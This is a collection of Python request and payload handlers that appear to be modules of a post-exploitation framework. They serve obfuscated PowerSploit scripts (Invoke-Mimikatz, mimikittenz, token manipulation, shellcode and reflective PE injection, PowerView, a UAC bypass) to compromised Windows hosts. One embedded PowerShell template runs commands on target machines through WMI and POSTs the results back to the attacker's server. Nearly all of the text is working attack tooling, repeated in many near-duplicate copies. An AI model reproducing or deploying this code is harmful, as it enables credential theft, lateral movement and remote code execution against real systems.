def on_request(self, context, request):
    """Serve the two resources requested by the token-riding stage.

    ``/Invoke-TokenManipulation.ps1``: the script at
    ``Exfiltration/Invoke-TokenManipulation.ps1`` (resolved by
    ``get_ps_script``) is passed through ``obfs_ps_script`` with
    ``self.obfs_name`` and written to ``request.wfile``.
    ``/TokenRider.ps1``: a PowerShell snippet is rendered from the
    ``str.format`` template below, filled with ``context.server``,
    ``context.localip`` and ``context.server_port`` (where the snippet POSTs
    its output), ``self.target_computers`` and ``self.command``.
    Any other path gets a 404 with no body.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-TokenManipulation.ps1':
        respond(200)
        # Headers go out before the file is opened, so a read failure leaves
        # a 200 status with an empty body.
        with open(get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read(), self.obfs_name)
        request.wfile.write(body)
    elif requested == 'TokenRider.ps1':
        respond(200)
        # self.command is wrapped in cmd.exe and inserted verbatim into the
        # double-quoted -ArgumentList string of the template; no quoting is
        # applied here.
        wrapped_command = 'cmd.exe /c {}'.format(self.command)
        # The literal is a str.format template, hence every PowerShell brace
        # is doubled ({{ / }}) and only the named fields are substituted.
        template = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''
        rendered = template.format(
            server=context.server,
            addr=context.localip,
            port=context.server_port,
            targets=self.target_computers,
            command=wrapped_command,
        )
        request.wfile.write(rendered)
    else:
        respond(404)
def on_request(self, context, request):
    """Serve the shellcode loader script and the shellcode file.

    ``/Invoke-Shellcode.ps1`` returns the script at
    ``Powersploit/CodeExecution/Invoke-Shellcode.ps1`` after ``obfs_ps_script``
    with ``self.obfs_name``.  A path equal to the basename of
    ``self.shellcode_path`` returns that file's raw bytes and then calls
    ``request.stop_tracking_host()``.  Anything else is a bodyless 404.
    ``context`` is unused.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-Shellcode.ps1':
        respond(200)
        with open(get_ps_script('Powersploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read(), self.obfs_name)
        request.wfile.write(body)
    elif requested == os.path.basename(self.shellcode_path):
        respond(200)
        with open(self.shellcode_path, 'rb') as blob:
            request.wfile.write(blob.read())
        # File delivered: the host needs no further tracking.
        request.stop_tracking_host()
    else:
        respond(404)
def on_request(self, context, request):
    """Serve the two resources requested by the token-riding stage.

    ``/Invoke-TokenManipulation.ps1``: the script at
    ``Exfiltration/Invoke-TokenManipulation.ps1`` (resolved by
    ``get_ps_script``) is passed through ``obfs_ps_script`` with
    ``self.obfs_name`` and written to ``request.wfile``.
    ``/TokenRider.ps1``: a PowerShell snippet is rendered from the
    ``str.format`` template below, filled with ``context.server``,
    ``context.localip`` and ``context.server_port`` (where the snippet POSTs
    its output), ``self.target_computers`` and ``self.command``.
    Any other path gets a 404 with no body.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-TokenManipulation.ps1':
        respond(200)
        # Headers go out before the file is opened, so a read failure leaves
        # a 200 status with an empty body.
        with open(get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read(), self.obfs_name)
        request.wfile.write(body)
    elif requested == 'TokenRider.ps1':
        respond(200)
        # self.command is wrapped in cmd.exe and inserted verbatim into the
        # double-quoted -ArgumentList string of the template; no quoting is
        # applied here.
        wrapped_command = 'cmd.exe /c {}'.format(self.command)
        # The literal is a str.format template, hence every PowerShell brace
        # is doubled ({{ / }}) and only the named fields are substituted.
        template = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''
        rendered = template.format(
            server=context.server,
            addr=context.localip,
            port=context.server_port,
            targets=self.target_computers,
            command=wrapped_command,
        )
        request.wfile.write(rendered)
    else:
        respond(404)
def payload(self, context, command):
    """Return the obfuscated contents of the bundled ``Invoke-Mimikatz.ps1``.

    The original author notes that, because the Chrome decryption feature was
    new at the time, the latest Mimikatz build was compiled manually, the
    base64-encoded binary inside ``Invoke-Mimikatz.ps1`` was updated, and the
    patch posted by @gentilkiwi at
    https://github.com/PowerShellMafia/PowerSploit/issues/147 was applied so
    newer builds work when injected.  That updated script (resolved by
    ``get_ps_script('Invoke-Mimikatz.ps1')``) is used here instead of the
    PowerSploit copy.  ``context`` and ``command`` are not used.
    """
    script_path = get_ps_script('Invoke-Mimikatz.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def on_request(self, context, request):
    """Serve ``/PowerView.ps1``; answer 404 for any other path.

    The script at ``Recon/PowerView.ps1`` (resolved by ``get_ps_script``) is
    passed through ``obfs_ps_script`` with no extra arguments and written to
    ``request.wfile`` after a 200 response.  ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'PowerView.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Headers are already sent; a read failure here leaves an empty 200 body.
    with open(get_ps_script('Recon/PowerView.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read())
    request.wfile.write(body)
def on_request(self, context, request):
    """Serve ``/PowerView.ps1``; answer 404 for any other path.

    The script at ``PowerSploit/Recon/PowerView.ps1`` (resolved by
    ``get_ps_script``) is passed through ``obfs_ps_script`` with no extra
    arguments and written to ``request.wfile`` after a 200 response.
    ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'PowerView.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Headers are already sent; a read failure here leaves an empty 200 body.
    with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read())
    request.wfile.write(body)
def on_request(self, context, request):
    """Serve ``/Invoke-Mimikatz.ps1``; answer 404 for any other path.

    The script at ``PowerSploit/Exfiltration/Invoke-Mimikatz.ps1`` (resolved
    by ``get_ps_script``) is passed through ``obfs_ps_script`` with
    ``self.obfs_name`` and written to ``request.wfile`` after a 200 response.
    ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'Invoke-Mimikatz.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Headers are already sent; a read failure here leaves an empty 200 body.
    with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read(), self.obfs_name)
    request.wfile.write(body)
def on_request(self, context, request):
    """Serve ``/Invoke-TokenManipulation.ps1``; answer 404 for any other path.

    The script at ``PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1``
    (resolved by ``get_ps_script``) is passed through ``obfs_ps_script`` with
    ``self.obfs_name`` and written to ``request.wfile`` after a 200 response.
    ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'Invoke-TokenManipulation.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Headers are already sent; a read failure here leaves an empty 200 body.
    with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read(), self.obfs_name)
    request.wfile.write(body)
def on_request(self, context, request):
    """Serve ``/Invoke-mimikittenz.ps1``; answer 404 for any other path.

    The script at ``mimikittenz/Invoke-mimikittenz.ps1`` (resolved by
    ``get_ps_script``) is passed through ``obfs_ps_script`` with
    ``function_name=self.obfs_name`` and written to ``request.wfile`` after a
    200 response.  ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'Invoke-mimikittenz.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Headers are already sent; a read failure here leaves an empty 200 body.
    with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read(), function_name=self.obfs_name)
    request.wfile.write(body)
def on_request(self, context, request):
    """Serve ``/Invoke-Shellcode.ps1``; answer 404 for any other path.

    The script at ``CodeExecution/Invoke-Shellcode.ps1`` (resolved by
    ``get_ps_script``) is passed through ``obfs_ps_script`` with
    ``self.obfs_name`` and written to ``request.wfile`` after a 200 response;
    ``request.stop_tracking_host()`` is then called.  ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'Invoke-Shellcode.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Headers are already sent; a read failure here leaves an empty 200 body.
    with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read(), self.obfs_name)
    request.wfile.write(body)
    # Script delivered: the host needs no further tracking.
    request.stop_tracking_host()
def on_request(self, context, request, launcher, payload):
    """Serve the token-manipulation script or the pre-built ``payload``.

    ``/Invoke-TokenManipulation.ps1`` returns the script at
    ``PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1`` after
    ``obfs_ps_script`` (no extra arguments).  ``/TokenRider.ps1`` writes the
    ``payload`` argument to ``request.wfile`` as-is.  Any other path is a
    bodyless 404.  ``context`` and ``launcher`` are unused here.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-TokenManipulation.ps1':
        respond(200)
        with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read())
        request.wfile.write(body)
    elif requested == 'TokenRider.ps1':
        respond(200)
        # The payload is built by the caller; it is passed through untouched.
        request.wfile.write(payload)
    else:
        respond(404)
def on_request(self, context, request):
    """Serve ``/Invoke-Mimikatz.ps1``; answer 404 for any other path.

    The bundled ``Invoke-Mimikatz.ps1`` (resolved by ``get_ps_script``) is
    passed through ``obfs_ps_script`` with ``self.obfs_name`` and written to
    ``request.wfile`` after a 200 response.  ``context`` is unused.
    """
    requested = request.path[1:]
    if requested != 'Invoke-Mimikatz.ps1':
        request.send_response(404)
        request.end_headers()
        return
    request.send_response(200)
    request.end_headers()
    # Per the original author: the Chrome decryption feature was new, so the
    # latest Mimikatz was compiled manually, the base64 binary inside
    # Invoke-Mimikatz.ps1 was updated, and the patch @gentilkiwi posted at
    # https://github.com/PowerShellMafia/PowerSploit/issues/147 was applied
    # so newer builds work when injected.  That updated script is served
    # here instead of the PowerSploit copy.
    with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as fh:
        body = obfs_ps_script(fh.read(), self.obfs_name)
    request.wfile.write(body)
def on_request(self, context, request, launcher, payload):
    """Serve the token-manipulation script or the pre-built ``payload``.

    ``/Invoke-TokenManipulation.ps1`` returns the script at
    ``PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1`` after
    ``obfs_ps_script`` (no extra arguments).  ``/TokenRider.ps1`` writes the
    ``payload`` argument to ``request.wfile`` as-is.  Any other path is a
    bodyless 404.  ``context`` and ``launcher`` are unused here.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == "Invoke-TokenManipulation.ps1":
        respond(200)
        with open(get_ps_script("PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1"), "r") as fh:
            body = obfs_ps_script(fh.read())
        request.wfile.write(body)
    elif requested == "TokenRider.ps1":
        respond(200)
        # The payload is built by the caller; it is passed through untouched.
        request.wfile.write(payload)
    else:
        respond(404)
def on_request(self, context, request):
    """Serve the reflective-injection script and the payload file.

    ``/Invoke-ReflectivePEInjection.ps1`` returns the script at
    ``CodeExecution/Invoke-ReflectivePEInjection.ps1`` after ``obfs_ps_script``
    with ``self.obfs_name``.  A path equal to the basename of
    ``self.payload_path`` calls ``request.stop_tracking_host()`` and then
    returns that file's raw bytes.  Anything else is a bodyless 404.
    ``context`` is unused.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-ReflectivePEInjection.ps1':
        respond(200)
        with open(get_ps_script('CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read(), self.obfs_name)
        request.wfile.write(body)
    elif requested == os.path.basename(self.payload_path):
        respond(200)
        # Tracking stops before the file is streamed out.
        request.stop_tracking_host()
        with open(self.payload_path, 'rb') as blob:
            request.wfile.write(blob.read())
    else:
        respond(404)
def on_request(self, context, request):
    """Serve the shellcode loader script and the shellcode file.

    ``/Invoke-Shellcode.ps1`` returns the script at
    ``CodeExecution/Invoke-Shellcode.ps1`` after ``obfs_ps_script`` with
    ``self.obfs_name``.  A path equal to the basename of
    ``self.shellcode_path`` returns that file's raw bytes and then calls
    ``request.stop_tracking_host()``.  Anything else is a bodyless 404.
    ``context`` is unused.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-Shellcode.ps1':
        respond(200)
        with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read(), self.obfs_name)
        request.wfile.write(body)
    elif requested == os.path.basename(self.shellcode_path):
        respond(200)
        with open(self.shellcode_path, 'rb') as blob:
            request.wfile.write(blob.read())
        # File delivered: the host needs no further tracking.
        request.stop_tracking_host()
    else:
        respond(404)
def on_request(self, context, request):
    """Serve the reflective-injection script and the payload file.

    ``/Invoke-ReflectivePEInjection.ps1`` returns the script at
    ``CodeExecution/Invoke-ReflectivePEInjection.ps1`` after ``obfs_ps_script``
    with ``self.obfs_name``.  A path equal to the basename of
    ``self.payload_path`` calls ``request.stop_tracking_host()`` and then
    returns that file's raw bytes.  Anything else is a bodyless 404.
    ``context`` is unused.
    """
    requested = request.path[1:]

    def respond(status):
        request.send_response(status)
        request.end_headers()

    if requested == 'Invoke-ReflectivePEInjection.ps1':
        respond(200)
        with open(get_ps_script('CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as fh:
            body = obfs_ps_script(fh.read(), self.obfs_name)
        request.wfile.write(body)
    elif requested == os.path.basename(self.payload_path):
        respond(200)
        # Tracking stops before the file is streamed out.
        request.stop_tracking_host()
        with open(self.payload_path, 'rb') as blob:
            request.wfile.write(blob.read())
    else:
        respond(404)
def payload(self, context, command):
    """Return the obfuscated contents of ``PowerSploit/Recon/PowerView.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('PowerSploit/Recon/PowerView.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the raw contents of the bundled ``Invoke-EventVwrBypass.ps1``.

    Unlike the other ``payload`` hooks in this file, the text is returned
    without an ``obfs_ps_script`` pass.  ``context`` and ``command`` are not
    used.
    """
    script_path = get_ps_script('Invoke-EventVwrBypass.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return source
def payload(self, context, command):
    """Return the obfuscated contents of ``mimikittenz/Invoke-mimikittenz.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('mimikittenz/Invoke-mimikittenz.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the obfuscated contents of
    ``PowerSploit/CodeExecution/Invoke-Shellcode.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the obfuscated contents of
    ``PowerSploit/CodeExecution/Invoke-Shellcode.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the obfuscated contents of
    ``PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the obfuscated contents of the bundled ``Invoke-Mimikatz.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('Invoke-Mimikatz.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the obfuscated contents of ``mimikittenz/Invoke-mimikittenz.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script("mimikittenz/Invoke-mimikittenz.ps1")
    with open(script_path, "r") as fh:
        source = fh.read()
    return obfs_ps_script(source)
def payload(self, context, command):
    """Return the obfuscated contents of
    ``PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1``.

    The path is resolved by ``get_ps_script`` and the text is passed through
    ``obfs_ps_script`` with no extra arguments.  ``context`` and ``command``
    are not used.
    """
    script_path = get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1')
    with open(script_path, 'r') as fh:
        source = fh.read()
    return obfs_ps_script(source)